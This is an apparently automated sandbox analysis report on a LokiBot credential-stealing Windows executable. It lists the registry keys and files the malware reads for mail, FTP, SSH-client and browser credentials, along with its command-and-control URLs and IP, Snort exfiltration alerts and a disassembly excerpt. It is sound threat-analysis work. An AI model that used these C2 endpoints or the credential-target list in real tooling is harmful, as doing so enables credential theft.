                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeThread delayed: delay time: 60000
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_00402B7C GetProcessHeap,RtlAllocateHeap,
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_0040317B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess queried: DebugPort
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_00406069 GetUserNameW,

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected LokibotShow sources
                        Source: Yara matchFile source: rfxJzZjiWv.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rfxJzZjiWv.exe PID: 6644, type: MEMORYSTR
                        Tries to steal Mail credentials (via file / registry access)Show sources
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                        Tries to harvest and steal ftp login credentialsShow sources
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                        Tries to steal Mail credentials (via file registry)Show sources
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: PopPassword
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: SmtpPassword
                        Tries to harvest and steal browser information (history, passwords, etc)Show sources
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: Yara matchFile source: rfxJzZjiWv.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, type: MEMORY

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management InstrumentationPath InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping2Security Software Discovery2Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion21Credentials in Registry2Virtualization/Sandbox Evasion21Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Access Token Manipulation1Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol112SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                        Behavior Graph

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        rfxJzZjiWv.exe88%VirustotalBrowse
                        rfxJzZjiWv.exe88%MetadefenderBrowse
                        rfxJzZjiWv.exe96%ReversingLabsWin32.Trojan.LokiBot
                        rfxJzZjiWv.exe100%AviraTR/Crypt.XPACK.Gen
                        rfxJzZjiWv.exe100%Joe Sandbox ML

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        0.0.rfxJzZjiWv.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        0.2.rfxJzZjiWv.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                        Domains

                        SourceDetectionScannerLabelLink
                        naourl.com6%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                        http://alphastand.win/alien/fre.php0%URL Reputationsafe
                        http://naourl.com/data/five/fre.php11%VirustotalBrowse
                        http://naourl.com/data/five/fre.php0%Avira URL Cloudsafe
                        http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                        http://alphastand.top/alien/fre.php0%URL Reputationsafe
                        http://www.ibsensoftware.com/0%URL Reputationsafe
                        http://survey-smiles.com5%VirustotalBrowse
                        http://survey-smiles.com0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        naourl.com
                        212.32.237.90
                        truetrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://kbfvzoboss.bid/alien/fre.phptrue
                        • URL Reputation: safe
                        unknown
                        http://alphastand.win/alien/fre.phptrue
                        • URL Reputation: safe
                        unknown
                        http://naourl.com/data/five/fre.phptrue
                        • 11%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://alphastand.trade/alien/fre.phptrue
                        • URL Reputation: safe
                        unknown
                        http://alphastand.top/alien/fre.phptrue
                        • URL Reputation: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.ibsensoftware.com/rfxJzZjiWv.exefalse
                        • URL Reputation: safe
                        unknown
                        http://survey-smiles.comrfxJzZjiWv.exe, 00000000.00000002.662546536.0000000000751000.00000004.00000020.sdmpfalse
                        • 5%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        212.32.237.90
                        naourl.comNetherlands
                        60781LEASEWEB-NL-AMS-01NetherlandsNLtrue

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:534005
                        Start date:04.12.2021
                        Start time:23:39:35
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 2m 44s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:rfxJzZjiWv.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:5
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@1/2@5/2
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 100% (good quality ratio 95.9%)
                        • Quality average: 77%
                        • Quality standard deviation: 28.6%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 20.82.209.183
                        • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com, arc.trafficmanager.net, arc.msn.com
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        23:40:27API Interceptor3x Sleep call for process: rfxJzZjiWv.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        212.32.237.90PVCbiDUqly50DqS.exeGet hashmaliciousBrowse
                        • www.lendisty.com/n3kw/?XBZ4Xz=3e7Yc+NXVXGadH5y5BNj3Y3Se2h8oiNm35D3uKayWhE9KadvN5yxkmKGsLBu645DSWG9&5jJtSj=uXStFZp8ar
                        Fatura - Ex#35175382.pdf.exeGet hashmaliciousBrowse
                        • www.mwal.art/mabs/?jX8=3fQLnD&s0=y5mht5ETURUFzQSCIUXjodTlI+2TrsvqVBKlsua0zkPwCIYtRvvnPuF29Yxp6gBGwBsBQjQVNQ==
                        1lHMXoDyPa.exeGet hashmaliciousBrowse
                        • www.thetravellingwitch.com/wufn/?jrDHJt=SkZZDimXYK2GAldHwXdupEC24fazy/RNnOtrI6tDOvPCvzBdUVr3zvvTsRlAE2ql+mXxxlQZWg==&fR-=_JE8XJdXJfIL8n7
                        UJ8y5QToVc.exeGet hashmaliciousBrowse
                        • www.stearmanestates.com/ixwn/?W6AlL=PkY2LXPJp6HaPUrgGBEF3fMC5B3U3PtoZvpjUGm/uozF9Gfrzlf5sS41ov77FP8zbsbQ&-ZS8=9rJ0dRNxBdO0ALQp
                        OoBepaLH3W.exeGet hashmaliciousBrowse
                        • www.ololmychartlogin.com/p2io/?brMXBhD=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9Ot1G4m5E5eG&axl4i=0d9HO65X_T8H0F
                        bin.exeGet hashmaliciousBrowse
                        • www.futeboplayhd.com/cvrn/?9rSx00op=cI6gjmZKBv9uYsypK0vTgXjIez8bgYte2jg17UPI8uiUbtEGnMVqV/X2US4uhWYMbwpwMQFc9A==&StT=FR-8dxEhSB
                        F63V4i8eZU.exeGet hashmaliciousBrowse
                        • www.tearor.com/nff/?D48p=4F7AytNRxG9Okht4XRBjCmtmhOo761MGK9UHRz2K68ko8sG2VRn93GfHKNzVTrlp6vls&-ZgX=tR-DSFa8o
                        invoice.exeGet hashmaliciousBrowse
                        • www.bradforrexchange.com/3edq/?l6L0N=jO6sWaazfWUScqk/UMZ2V9vSXHj7s0GXSNY0VsmNmZeYB4f0QdniyMTma+6l76TklIvb&0BIX=M8Fp-rt
                        IsIMH5zplo.exeGet hashmaliciousBrowse
                        • www.ololmychartlogin.com/p2io/?n2MLF0Ux=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9Ot1G4m5E5eG&Dj6t=CpStsPY
                        USU(1).exeGet hashmaliciousBrowse
                        • www.bravefctv.com/zrmt/?P0G=EjUHInR&9r7T-=qIu/umqcIRyioTP+pvG+OWyvgre6YRhQlm6oiia3xqVFZWqPiKKv9qZBiAyUvYT1LHAt
                        bin.exeGet hashmaliciousBrowse
                        • www.ololmychartlogin.com/p2io/?qFQl7Pf8=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9NNPWpGBee/B&uN9hQ=ejlP_vuP4dl4N6
                        Yd7WOb1ksAj378N.exeGet hashmaliciousBrowse
                        • www.logittechg.com/sdh/?1b8Hsf=77GdCQf+cwNQcKtc4oP1L/izBQDHSDhpXIme07zuD8PhYeFl9nbDWdZJRwCLRhIFBccKSxqqHg==&j2MHoV=aDKhQD6PL
                        SWIFT MT103_Pdf.exeGet hashmaliciousBrowse
                        • www.laytikes.com/dll/?IR-4gF=rElkgYOcKLyb2ER2+Vlm0C8Ey2iKs9RZbxxxg2Tq9pxKpXGj+SPpWyY1djYg2iNp+BFv&Cj=lN9DoTMPZhdP
                        NWvnpLrdx4.exeGet hashmaliciousBrowse
                        • www.tishomingoinn.net/da0a/?D6Ap=ZfoTzbtx3ht&0pn=Rkrz4t3Ha8KNN1GxvDSxFj/JaPfAsCp6BjG/Fo7u/30cJxHSnd0meOFBOn5zZDOPw9ZFI5pbIw==
                        Statement for T10495.jarGet hashmaliciousBrowse
                        • www.mitbss.com/bnuw/?BZ=G4og8SmNJcmToC/1vURkjn6Fi/ymhkVmkW/Vhx9xfHxVp69hNmL93pjEBnq/aUUp6pz0&I48=4hOt163

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        LEASEWEB-NL-AMS-01NetherlandsNLGenoSec.armGet hashmaliciousBrowse
                        • 31.186.168.35
                        jKira.x86Get hashmaliciousBrowse
                        • 85.17.204.186
                        sys.exeGet hashmaliciousBrowse
                        • 93.190.222.52
                        Linux_x86Get hashmaliciousBrowse
                        • 213.227.132.36
                        rIiLBFxqPWGet hashmaliciousBrowse
                        • 46.182.122.55
                        YBni6CEBNMGet hashmaliciousBrowse
                        • 31.186.168.29
                        2018_11Informationen_betreffend_Transaktion.docGet hashmaliciousBrowse
                        • 95.211.144.68
                        Z4joY8Uhri.exeGet hashmaliciousBrowse
                        • 5.79.68.108
                        Se adjunta la factura proforma..exeGet hashmaliciousBrowse
                        • 212.32.237.91
                        MBFlKf1tsnGet hashmaliciousBrowse
                        • 83.149.87.180
                        YwZpT3p5Rh.msiGet hashmaliciousBrowse
                        • 95.211.136.23
                        uSY5H9rWjcGet hashmaliciousBrowse
                        • 83.149.87.180
                        DkTfOvsiCRGet hashmaliciousBrowse
                        • 45.130.62.155
                        Gs4CPvVFehGet hashmaliciousBrowse
                        • 83.149.87.180
                        Zp8WueaaAzGet hashmaliciousBrowse
                        • 83.149.87.180
                        XEhV64HdYTGet hashmaliciousBrowse
                        • 83.149.87.180
                        O86VH1rksjGet hashmaliciousBrowse
                        • 83.149.87.180
                        h6FAN1b2EWGet hashmaliciousBrowse
                        • 83.149.87.180
                        U6Qlvhqbs0Get hashmaliciousBrowse
                        • 83.149.87.180
                        bLn8EPVC21Get hashmaliciousBrowse
                        • 83.149.87.180

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                        Process:C:\Users\user\Desktop\rfxJzZjiWv.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview: 1
                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                        Process:C:\Users\user\Desktop\rfxJzZjiWv.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):46
                        Entropy (8bit):1.0424600748477153
                        Encrypted:false
                        SSDEEP:3:/lbq:4
                        MD5:8CB7B7F28464C3FCBAE8A10C46204572
                        SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                        SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                        SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: ........................................user.

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.05714066527445
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:rfxJzZjiWv.exe
                        File size:106496
                        MD5:8ed7e6b478cf0c00934bb42e3bdf5e20
                        SHA1:ceb70c6dc5a85a64cc7a47e0ec12936f2d5e57db
                        SHA256:4395224e257fe5659011fb90649c89d295e80123d7622d6cdb5b09371573e1aa
                        SHA512:db4f78f56df60bcc906588546d0bb55b7ff9ec483484a6d70f891bb33fc84339cf1ee77973f785f1f71d6b1eb8090449078bdc8ededb70a41c094cfa0b5affee
                        SSDEEP:1536:czvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqdIzmd:nSHIG6mQwGmfOQd8YhY0/EgUG
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x.....................K.K.............=2......................................=2......=2......Rich............PE..L.....lW...

                        File Icon

                        Icon Hash:00828e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0x4139de
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        DLL Characteristics:TERMINAL_SERVER_AWARE
                        Time Stamp:0x576C0885 [Thu Jun 23 16:04:21 2016 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:0239fd611af3d0e9b0c46c5837c80e09

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
                        push ecx
                        and dword ptr [ebp-04h], 00000000h
                        lea eax, dword ptr [ebp-04h]
                        push esi
                        push edi
                        push eax
                        call 00007F8788837F79h
                        push eax
                        call 00007F8788837F56h
                        xor esi, esi
                        mov edi, eax
                        pop ecx
                        pop ecx
                        cmp dword ptr [ebp-04h], esi
                        jle 00007F8788838136h
                        push 004188BCh
                        push dword ptr [edi+esi*4]
                        call 00007F878882A605h
                        pop ecx
                        pop ecx
                        test eax, eax
                        je 00007F878883811Dh
                        push 00002710h
                        call 00007F878882AEBAh
                        pop ecx
                        inc esi
                        cmp esi, dword ptr [ebp-04h]
                        jl 00007F87888380EEh
                        push 00000000h
                        call 00007F8788837F4Eh
                        push 00000000h
                        call 00007F8788838262h
                        pop ecx
                        pop edi
                        xor eax, eax
                        pop esi
                        mov esp, ebp
                        pop ebp
                        retn 0010h
                        push ebp
                        mov ebp, esp
                        xor eax, eax
                        push eax
                        push eax
                        push E567384Dh
                        push eax
                        call 00007F87888278A9h
                        push dword ptr [ebp+08h]
                        call eax
                        pop ebp
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        mov esi, dword ptr [ebp+08h]
                        test esi, esi
                        je 00007F8788838174h
                        push esi
                        call 00007F878882A3D0h
                        pop ecx
                        test eax, eax
                        je 00007F8788838169h
                        push esi
                        call 00007F878882840Ch
                        pop ecx
                        test eax, eax
                        je 00007F878883815Eh
                        mov eax, dword ptr [0049FDECh]
                        cmp dword ptr [ebp+10h], 00000000h
                        cmovne eax, dword ptr [ebp+10h]
                        push eax
                        push dword ptr [0049FDE8h]
                        call 00007F8788829E04h
                        push dword ptr [ebp+0Ch]
                        push dword ptr [0049FDE8h]
                        call 00007F8788829DF6h
                        push 00000000h
                        push 00000000h
                        push esi

                        Rich Headers

                        Programming Language:
                        • [ASM] VS2008 SP1 build 30729
                        • [ASM] VS2003 (.NET) build 3077
                        • [ C ] VS2008 SP1 build 30729
                        • [LNK] VS2013 UPD5 build 40629
                        • [C++] VS2013 UPD5 build 40629
                        • [IMP] VS2008 SP1 build 30729

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x18ed00x64.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x150000x5c.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x136f50x13800False0.568509615385data6.49204829439IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata0x150000x40600x4200False0.370087594697data4.26890991196IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x1a0000x85e240x200False0.12890625data0.946496689201IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .x0xa00000x20000x2000False0.0181884765625data0.198253121373IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                        Imports

                        DLLImport
                        WS2_32.dllgetaddrinfo, freeaddrinfo, closesocket, WSAStartup, socket, send, recv, connect
                        KERNEL32.dllGetProcessHeap, HeapFree, HeapAlloc, SetLastError, GetLastError
                        ole32.dllCoCreateInstance, CoInitialize, CoUninitialize
                        OLEAUT32.dllVariantInit, SysFreeString, SysAllocString

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        12/04/21-23:40:25.169299TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14975280192.168.2.4212.32.237.90
                        12/04/21-23:40:25.169299TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.4212.32.237.90
                        12/04/21-23:40:25.169299TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.4212.32.237.90
                        12/04/21-23:40:25.169299TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24975280192.168.2.4212.32.237.90
                        12/04/21-23:40:26.584318TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14976580192.168.2.4212.32.237.90
                        12/04/21-23:40:26.584318TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.4212.32.237.90
                        12/04/21-23:40:26.584318TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.4212.32.237.90
                        12/04/21-23:40:26.584318TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24976580192.168.2.4212.32.237.90
                        12/04/21-23:40:27.790426TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.4212.32.237.90
                        12/04/21-23:40:27.790426TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.4212.32.237.90
                        12/04/21-23:40:27.790426TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.4212.32.237.90
                        12/04/21-23:40:27.790426TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.4212.32.237.90
                        12/04/21-23:40:28.827279TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.4212.32.237.90
                        12/04/21-23:40:28.827279TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.4212.32.237.90
                        12/04/21-23:40:28.827279TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.4212.32.237.90
                        12/04/21-23:40:28.827279TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.4212.32.237.90
                        12/04/21-23:40:29.848169TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.4212.32.237.90
                        12/04/21-23:40:29.848169TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.4212.32.237.90
                        12/04/21-23:40:29.848169TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.4212.32.237.90
                        12/04/21-23:40:29.848169TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.4212.32.237.90

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Dec 4, 2021 23:40:25.141088009 CET4975280192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:25.166338921 CET8049752212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:25.166424036 CET4975280192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:25.169298887 CET4975280192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:25.195113897 CET8049752212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:25.195162058 CET4975280192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:25.220299959 CET8049752212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:25.426904917 CET8049752212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:25.427032948 CET4975280192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:25.427285910 CET8049752212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:25.427331924 CET4975280192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:25.452235937 CET8049752212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:26.553580999 CET4976580192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:26.579066038 CET8049765212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:26.579268932 CET4976580192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:26.584317923 CET4976580192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:26.609769106 CET8049765212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:26.609910011 CET4976580192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:26.635215998 CET8049765212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:26.847377062 CET8049765212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:26.847559929 CET8049765212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:26.847645998 CET4976580192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:26.873150110 CET8049765212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:27.761544943 CET4976680192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:27.787653923 CET8049766212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:27.787765980 CET4976680192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:27.790426016 CET4976680192.168.2.4212.32.237.90
